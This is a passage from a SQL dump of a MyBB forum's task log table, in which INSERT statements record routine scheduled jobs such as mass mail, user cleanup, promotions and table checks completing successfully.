`dateline`, `data`) VALUES ('11918', '9', '1350847548', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11919', '3', '1350847803', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11920', '9', '1350848500', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11921', '5', '1350848716', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11922', '9', '1350849345', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11923', '3', '1350849585', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11924', '1', '1350849753', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11925', '7', '1350849767', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11926', '5', '1350849901', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11927', '9', '1350850227', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11928', '5', '1350851151', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11929', '9', '1350851202', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11930', '3', '1350851409', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11931', '9', '1350852023', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11932', '5', '1350852377', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11933', '9', '1350853155', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11934', '3', '1350853316', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11935', '1', '1350853357', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11936', '7', '1350853363', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11937', '5', '1350853512', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11938', '9', '1350853879', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11939', '5', '1350854852', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11940', '9', '1350854996', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11941', '3', '1350855040', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11942', '9', '1350855620', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11943', '5', '1350855913', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11944', '9', '1350856784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11945', '3', '1350856786', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11946', '1', '1350856809', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11947', '7', '1350856813', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11948', '5', '1350857129', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11949', '9', '1350857434', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11950', '5', '1350858319', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11951', '9', '1350858340', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11952', '3', '1350858612', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11953', '9', '1350859204', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11954', '5', '1350859506', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11955', '9', '1350860124', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11956', '3', '1350860363', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11957', '1', '1350860402', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11958', '7', '1350860404', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11959', '5', '1350860715', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11960', '9', '1350861005', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11961', '5', '1350861902', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11962', '9', '1350861915', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11963', '3', '1350862206', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11964', '9', '1350862804', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11965', '5', '1350863107', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11966', '9', '1350864203', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11967', '3', '1350864217', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11968', '1', '1350864245', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11969', '2', '1350864272', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11970', '7', '1350865198', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11971', '11', '1350865240', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11972', '5', '1350865248', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11973', '9', '1350865287', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11974', '5', '1350865631', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11975', '9', '1350865640', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11976', '3', '1350865819', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11977', '9', '1350866590', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11978', '5', '1350866705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11979', '9', '1350867304', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11980', '3', '1350867581', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11981', '1', '1350867717', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11982', '7', '1350867724', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11983', '5', '1350867910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11984', '9', '1350868238', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11985', '5', '1350869129', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11986', '9', '1350869793', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11987', '3', '1350869812', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11988', '9', '1350870048', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11989', '5', '1350870310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11990', '9', '1350870942', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11991', '3', '1350871186', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11992', '1', '1350871356', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11993', '7', '1350871392', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11994', '5', '1350871566', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11995', '9', '1350871833', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11996', '5', '1350872703', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11997', '9', '1350872717', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11998', '3', '1350873017', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('11999', '9', '1350873660', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12000', '5', '1350873909', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12001', '9', '1350874539', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12002', '3', '1350874742', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12003', '1', '1350874801', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12004', '7', '1350874801', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12005', '5', '1350875102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12006', '9', '1350875423', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12007', '5', '1350876307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12008', '9', '1350876318', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12009', '3', '1350876614', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12010', '9', '1350877215', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12011', '5', '1350877569', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12012', '9', '1350878117', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12013', '3', '1350878378', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12014', '1', '1350878436', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12015', '7', '1350878447', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12016', '5', '1350878727', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12017', '9', '1350879049', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12018', '5', '1350879931', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12019', '9', '1350879937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12020', '3', '1350880393', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12021', '9', '1350880814', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12022', '5', '1350881103', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12023', '9', '1350881796', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12024', '3', '1350882020', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12025', '1', '1350882031', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12026', '7', '1350882033', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12027', '5', '1350882314', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12028', '9', '1350882614', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12029', '5', '1350884068', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12030', '9', '1350884096', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12031', '3', '1350884572', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12032', '3', '1350884572', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12033', '9', '1350885012', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12034', '5', '1350885107', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12035', '9', '1350885354', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12036', '3', '1350886906', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12037', '1', '1350887318', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12038', '7', '1350887955', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12039', '5', '1350887993', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12040', '9', '1350888096', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12041', '3', '1350888356', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12042', '5', '1350888361', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12043', '9', '1350889015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12044', '3', '1350889170', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12045', '1', '1350889345', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12046', '7', '1350889358', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12047', '5', '1350889691', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12048', '9', '1350889870', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12049', '5', '1350890799', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12050', '9', '1350890863', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12051', '3', '1350892577', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12052', '9', '1350892611', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12053', '5', '1350892617', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12054', '3', '1350894136', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12055', '1', '1350896028', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12056', '7', '1350896048', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12057', '5', '1350896348', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12058', '9', '1350896776', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12059', '3', '1350898866', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12060', '1', '1350898871', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12061', '7', '1350898880', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12062', '5', '1350898883', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12063', '9', '1350898891', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12064', '5', '1350900302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12065', '9', '1350900462', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12066', '3', '1350900491', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12067', '1', '1350900503', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12068', '7', '1350900538', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12069', '9', '1350900614', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12070', '5', '1350901520', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12071', '9', '1350901580', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12072', '3', '1350901822', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12073', '9', '1350902429', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12074', '5', '1350902708', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12075', '9', '1350903313', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12076', '3', '1350903570', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12077', '1', '1350903667', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12078', '7', '1350903738', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12079', '5', '1350903959', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12080', '9', '1350904833', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12081', '5', '1350905113', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12082', '9', '1350905129', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12083', '3', '1350905612', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12084', '9', '1350906102', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12085', '5', '1350906318', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12086', '9', '1350906912', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12087', '3', '1350907148', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12088', '1', '1350907201', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12089', '4', '1350907212', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12090', '7', '1350907896', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12091', '5', '1350907963', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12092', '9', '1350907996', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12093', '5', '1350908736', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12094', '9', '1350908750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12095', '3', '1350909005', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12096', '9', '1350909622', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12097', '5', '1350909999', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12098', '9', '1350910707', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12099', '3', '1350910770', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12100', '1', '1350910855', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12101', '7', '1350910859', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12102', '5', '1350911262', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12103', '9', '1350911452', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12104', '5', '1350912932', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12105', '9', '1350913403', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12106', '3', '1350913532', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12107', '5', '1350913596', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12108', '9', '1350914612', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12109', '3', '1350914647', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12110', '1', '1350914697', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12111', '7', '1350914711', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12112', '5', '1350914727', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12113', '9', '1350915343', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12114', '5', '1350915978', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12115', '9', '1350916017', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12116', '3', '1350916203', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12117', '9', '1350916941', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12118', '5', '1350917218', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12119', '9', '1350918265', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12120', '3', '1350918291', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12121', '1', '1350918293', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12122', '7', '1350918298', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12123', '5', '1350918308', 